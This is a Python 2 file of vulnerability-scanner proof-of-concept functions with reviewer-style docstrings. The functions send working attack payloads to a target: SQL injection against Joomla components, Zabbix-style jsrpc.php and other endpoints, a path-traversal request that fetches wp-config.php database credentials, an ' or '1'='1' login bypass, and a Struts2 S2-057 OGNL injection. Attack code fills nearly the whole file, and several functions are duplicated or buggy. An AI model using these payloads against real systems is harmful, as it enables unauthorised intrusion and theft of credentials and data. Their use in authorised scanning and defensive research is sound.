def poc(_inp):
    """Probe each candidate base URL for an exposed ``viewdefaultdecorator.action`` endpoint.

    Args:
        _inp: host or URL; ``http://`` is prepended when no scheme is present.

    Returns:
        True as soon as one probed URL's body contains ``.properties``,
        False otherwise -- including on *any* exception, so a network
        error or timeout is indistinguishable from "not affected".
    """
    try:
        if '://' not in _inp:
            _inp = 'http://' + _inp
        # iterate_path() is defined elsewhere; presumably yields candidate
        # base URLs derived from _inp -- confirm against its definition.
        for inp in iterate_path(_inp):
            payloads = ['/spaces/viewdefaultdecorator.action?decoratorName=']
            for each in payloads:
                # No timeout on this request: a non-responsive host stalls
                # the whole scan run. Python 2 code (see except syntax), so
                # .content is a str and the substring test works directly.
                if '.properties' in requests.get(url=inp + each).content:
                    return True
        return False
    except Exception, e:
        # `e` is never used; the failure cause is discarded.
        return False
def poc(url):
    """Check candidate paths for a ``force-download.php`` handler that serves ``wp-config.php``.

    Args:
        url: host or URL; ``http://`` is prepended when no scheme is present.

    Returns:
        The full probed URL when the response looks like a PHP config file
        (contains both ``define(`` and ``DB_PASSWORD``); otherwise falls off
        the end and returns None. Sibling ``poc`` functions in this file
        return False on a miss, so callers that test ``is False`` will not
        match this one.
    """
    if '://' not in url:
        url = 'http://' + url
    payload = '/force-download.php?file=wp-config.php'
    for i in iterate_path(url):
        # Candidate URLs that already carry a query string are skipped.
        if '?' in i:
            continue
        target = i.rstrip('/') + payload
        try:
            # urlopen() is called without a timeout, so a hung connection
            # blocks indefinitely. Note the body fetched here would hold live
            # database credentials; only the URL is returned, the body is
            # not stored or logged by this function.
            r = urllib2.urlopen(target).read()  # cannot use requests here
            if 'define(' in r and 'DB_PASSWORD' in r:
                return target
        except Exception, e:
            # Any error (connection refused, HTTP 4xx/5xx raised by
            # urllib2, ...) is silently treated as "not affected".
            pass
def poc(url):
    """Error-based SQL injection check against ``com_registrationpro`` (Joomla component).

    Args:
        url: host or URL; ``http://`` is prepended when no scheme is present.

    Returns:
        The candidate path ``each`` for which the response echoed the
        expected marker; None when nothing matched (no explicit return).
    """
    if '://' not in url:
        url = 'http://' + url
    for each in iterate_path(url):
        # randomMD5() is defined elsewhere; presumably returns a random
        # plaintext and its MD5 digest so the marker is unique per request
        # (avoids false positives from static strings) -- confirm.
        plain, cipher = randomMD5(3)
        payload = "/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=1 AND (SELECT 7804 FROM(SELECT COUNT(*),CONCAT(0x7176786b71,(MID((IFNULL(CAST(md5({plain}) AS CHAR),0x20)),1,54)),0x716b707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)".format(plain=plain)
        if '?' in each:
            continue
        # NOTE(review): target_url is built from `url`, not `each`, so every
        # iteration requests the same URL; `each` only feeds the '?' filter
        # and the return value.
        target_url = url.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
            if cipher in r.content:
                return each
        except Exception, e:
            # Errors are swallowed; `e` is unused.
            pass
def poc(url):
    """Error-based SQL injection check against ``com_videoflow`` (Joomla component).

    Structure is identical to the ``com_registrationpro`` check above; only
    the payload differs.

    Args:
        url: host or URL; ``http://`` is prepended when no scheme is present.

    Returns:
        The candidate path ``each`` whose response contained the per-request
        marker; None when nothing matched (no explicit return).
    """
    if '://' not in url:
        url = 'http://' + url
    for each in iterate_path(url):
        # Fresh random marker per iteration; see randomMD5() elsewhere in
        # the project for the (plain, digest) contract -- assumed, not shown.
        plain, cipher = randomMD5(3)
        payload = "/index.php?option=com_videoflow&task=search&vs=1&searchword=-3920%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x71786a7a71%2C%28MID%28%28IFNULL%28CAST%28md5%28{plain}%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2C0x716b6b7a71%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23".format(plain=plain)
        if '?' in each:
            continue
        # NOTE(review): built from `url` rather than `each`, so the same URL
        # is requested on every pass of the loop.
        target_url = url.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
            if cipher in r.content:
                return each
        except Exception, e:
            pass
def poc(target):
    """Detect an unauthenticated Apache Solr admin dashboard at the root or under ``/solr/``.

    Args:
        target: host or URL; ``http://`` is prepended when no scheme is present.

    Returns:
        The URL whose response was HTTP 200 and contained both ``Solr Admin``
        and ``Dashboard``; False when no candidate matched.
    """
    base_url = target if "://" in target else 'http://' + target
    for each in iterate_path(base_url):
        try:
            url = each
            # firefox() is defined elsewhere; presumably returns a browser
            # User-Agent string -- confirm. No timeout is set on either GET.
            g = requests.get(url, headers={'User-Agent': firefox()})
            # `is 200` compares identity, not value. It happens to hold on
            # CPython because small ints are cached, but `== 200` is what is
            # meant and is the only portable form.
            if g.status_code is 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content:
                return url
            url = url + '/solr/'
            g = requests.get(url, headers={'User-Agent': firefox()})
            if g.status_code is 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content:
                return url
        except Exception:
            # Connection errors for one candidate do not abort the others.
            pass
    return False
def poc(url):
    """Error-based (Oracle XMLType) SQL injection check on ``/express/showNotice.do``.

    Args:
        url: host or URL. Without a scheme, ``https://`` is chosen when the
            string contains ``:443``, otherwise ``http://``.

    Returns:
        The *base* ``url`` (not the matching candidate path, unlike most
        sibling checks) when the fixed marker is found in a response;
        False otherwise.
    """
    if '://' not in url:
        if ':443' in url:
            url = 'https://' + url
        else:
            url = 'http://' + url
    payload = "/express/showNotice.do?report_type=1&GKEY=2 AND 9753=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(119)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9753=9753) THEN 1 ELSE 0 END) FROM DUAL)||CHR(112)||CHR(107)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)"
    for each in iterate_path(url):
        target = each.rstrip('/') + payload
        try:
            r = requests.get(target, timeout=20)
            # The marker is a fixed literal rather than a per-request random
            # value (contrast the randomMD5-based checks in this file), so
            # any page that happens to contain it counts as a hit.
            if 'Warning: invalid QName ":qjwbq1pkkvq"' in r.content:
                return url
        except Exception:
            pass
    return False
def poc(url):
    """Authentication-bypass check against ``/myadmin/admin_validation.php``.

    Posts the same injection string as both ``userid`` and ``userpass`` and
    treats the presence of the post-login form ``frmNextstep`` as success.

    Args:
        url: host or URL; ``http://`` is prepended when no scheme is present.

    Returns:
        The full URL that accepted the bypass, or False when none did.
    """
    if '://' not in url:
        url = 'http://' + url
    payload = "' or '1'='1' -- ' ~ ' or '1'='1'"
    data = {'userid': payload, 'userpass': payload, 'submit': 'Enter'}
    for each in iterate_path(url):
        if '?' in each:
            continue
        target = each.rstrip('/') + '/myadmin/admin_validation.php'
        try:
            r = requests.post(target, data=data, timeout=15)
            # Marker is a fixed HTML fragment; a 200 on an unrelated page that
            # happens to contain it would also match.
            if 'form name="frmNextstep"' in r.content:
                return target
        except Exception:
            pass
    return False
def poc(url):
    """Error-based SQL injection check on ``jsrpc.php`` (``updatexml`` marker or generic SQL error text).

    Args:
        url: host or URL; ``http://`` is prepended when no scheme is present.

    Returns:
        ``'[mysql]' + each`` when the md5-derived marker is echoed, ``each``
        when only a generic SQL error string is seen, None otherwise (no
        explicit return at the end, unlike siblings that return False).
    """
    if '://' not in url:
        url = 'http://' + url
    # NOTE(review): the `×tamp=` fragment looks like `&timestamp=` mangled by
    # HTML-entity decoding (`&times`) somewhere upstream of this corpus;
    # left exactly as found.
    payload = "/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
    for each in iterate_path(url):
        if '?' in each:
            continue
        # NOTE(review): built from `url`, not `each` -- every iteration sends
        # the same request; `each` only affects the return value.
        target_url = url.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
            # Fixed hex marker; presumably a substring of md5(0x11) echoed back
            # through the updatexml() error -- not derivable from this file.
            if 'ed733b8d10be225eceba344d533586' in r.content:
                return '[mysql]' + each
            # Weaker signal: a generic database error message in the body.
            if 'Error in query [' in r.content or 'SQL error [' in r.content:
                return each
        except Exception, e:
            pass
def poc(url):
    """Duplicate of the preceding ``jsrpc.php`` check; differs only in whitespace around ``+``.

    Args:
        url: host or URL; ``http://`` is prepended when no scheme is present.

    Returns:
        ``'[mysql]' + each`` on the md5 marker, ``each`` on a generic SQL
        error string, None when nothing matched.
    """
    if '://' not in url:
        url = 'http://' + url
    # `×tamp=` is most likely an HTML-entity decoding artifact of
    # `&timestamp=` (see the identical payload above); kept verbatim.
    payload = "/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
    for each in iterate_path(url):
        if '?' in each:
            continue
        # Same observation as the sibling: `url`, not `each`, is used here.
        target_url = url.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
            if 'ed733b8d10be225eceba344d533586' in r.content:
                return '[mysql]'+ each
            if 'Error in query [' in r.content or 'SQL error [' in r.content:
                return each
        except Exception, e:
            pass
def poc(url):
    """Second copy of the ``com_videoflow`` error-based SQL injection check.

    Identical to the earlier copy apart from a line break inside the
    ``.format(`` call.

    Args:
        url: host or URL; ``http://`` is prepended when no scheme is present.

    Returns:
        The candidate path ``each`` whose response contained the per-request
        marker; None when nothing matched (no explicit return).
    """
    if '://' not in url:
        url = 'http://' + url
    for each in iterate_path(url):
        # (plain, digest) pair from the project's randomMD5() helper -- its
        # exact contract is not visible here.
        plain, cipher = randomMD5(3)
        payload = "/index.php?option=com_videoflow&task=search&vs=1&searchword=-3920%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x71786a7a71%2C%28MID%28%28IFNULL%28CAST%28md5%28{plain}%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2C0x716b6b7a71%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23".format( plain=plain)
        if '?' in each:
            continue
        # NOTE(review): `url` is used instead of `each`, so the loop repeats
        # one request per candidate rather than probing each candidate.
        target_url = url.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
            if cipher in r.content:
                return each
        except Exception, e:
            pass
def poc(url):
    """Second copy of the ``com_registrationpro`` error-based SQL injection check.

    Differs from the earlier copy by using a bare ``except:`` and by returning
    False explicitly when no candidate matches.

    Args:
        url: host or URL; ``http://`` is prepended when no scheme is present.

    Returns:
        The candidate path ``each`` whose response contained the per-request
        marker; False otherwise.
    """
    if '://' not in url:
        url = 'http://' + url
    for each in iterate_path(url):
        plain, cipher = randomMD5(3)
        payload = "/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=1 AND (SELECT 7804 FROM(SELECT COUNT(*),CONCAT(0x7176786b71,(MID((IFNULL(CAST(md5({plain}) AS CHAR),0x20)),1,54)),0x716b707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)".format(plain=plain)
        if '?' in each:
            continue
        # NOTE(review): built from `url`, not `each` (same as the siblings).
        target_url = url.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
            if cipher in r.content:
                return each
        except:
            # Bare except also swallows KeyboardInterrupt / SystemExit, so
            # Ctrl-C during a request is absorbed and the loop continues.
            pass
    return False
def poc(url, **kwargs):
    """Struts2 S2-057 (namespace OGNL) check using a random arithmetic expression as the oracle.

    A path segment ``${a-b}`` is inserted before the last path component; if
    the server answers 302 with the evaluated difference in ``Location`` and
    the redirected page also contains it, the target is reported.

    Args:
        url: base URL to scan; ignored when ``ip`` is given in kwargs.
        **kwargs: optional ``ip`` and ``port``. When ``ip`` is set, ``port``
            is concatenated directly, so a missing ``port`` raises TypeError
            (``str + None``) before any request is made.

    Returns:
        A result string (Chinese text, "target has Struts2-057, check url")
        naming the probed URL, or None when nothing matched.
    """
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url  # no-op assignment
    timeout = 10
    # get_domain() is defined elsewhere; presumably scheme://host[:port] --
    # used below to resolve the Location header.
    domain = get_domain(url)
    # NOTE(review): `proxies` is never passed to requests.get(); it is dead
    # code, so no request actually goes through 127.0.0.1:9999.
    proxies = {'http': '127.0.0.1:9999'}
    headers = {
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0'
    }
    # Random operands so the expected result cannot be pre-cached or guessed
    # from a static page; ran_check is what a real evaluation would produce.
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    parser = urlparse(url)
    if parser.path:
        # Despite the name this is a single string: the last path component.
        _path_list = parser.path.replace('//', '/').strip('/').split('/')[-1]
    else:
        _path_list = 'index.action'
    url_list = iterate_path(url)
    for urls in url_list:
        url = urls + '/${%s-%s}/%s' % (ran_a, ran_b, _path_list)
        try:
            # verify=False disables TLS certificate validation for both
            # requests below; acceptable only because this is a scanner probe
            # and the responses are not trusted for anything beyond matching.
            res = requests.get(
                url,
                timeout=timeout,
                headers=headers,
                allow_redirects=False,
                verify=False,
            )
            if res.status_code == 302 and res.headers.get(
                    'Location') is not None and str(
                        ran_check) in res.headers.get('Location'):
                urlLoca = res.headers.get('Location')
                # Assumes Location is a relative path; an absolute Location
                # would be double-prefixed with `domain` -- TODO confirm.
                res2 = requests.get(domain + urlLoca, headers=headers, timeout=6, allow_redirects=False, verify=False)
                if str(ran_check) in res2.text:
                    result = "目标存在 Struts2-057, check url: %s" % url
                    return result
        except:
            # Bare except: also absorbs KeyboardInterrupt during a request.
            pass
def poc(url):
    """UNION-based SQL injection check on ``/about/show.php`` using a random MD5 marker.

    Args:
        url: host or URL. Without a scheme, ``https://`` is chosen when the
            string contains ``:443``, otherwise ``http://``.

    Returns:
        The *base* ``url`` when a candidate answered 200 with the marker in
        the body; False otherwise.
    """
    if '://' not in url:
        if ':443' in url:
            url = 'https://' + url
        else:
            url = 'http://' + url
    # Called without the argument the sibling checks pass (randomMD5(3));
    # the helper presumably has a default -- confirm against its definition.
    plain, cipher = randomMD5()  # original note: verify using all columns, +70% hits
    payload = "/about/show.php?lang=en&id=-2864 UNION ALL SELECT " + (("md5(%s)," % plain) * 27).rstrip(',') + '--'
    for each in iterate_path(url):  # original note: try every sub-path, +20% hits
        target = each.rstrip('/') + payload
        try:
            r = requests.get(target, timeout=20)
            if r.status_code == 200 and cipher in r.content:
                return url
        except Exception:
            pass  # original note: changed from break to pass, +10% hits
    return False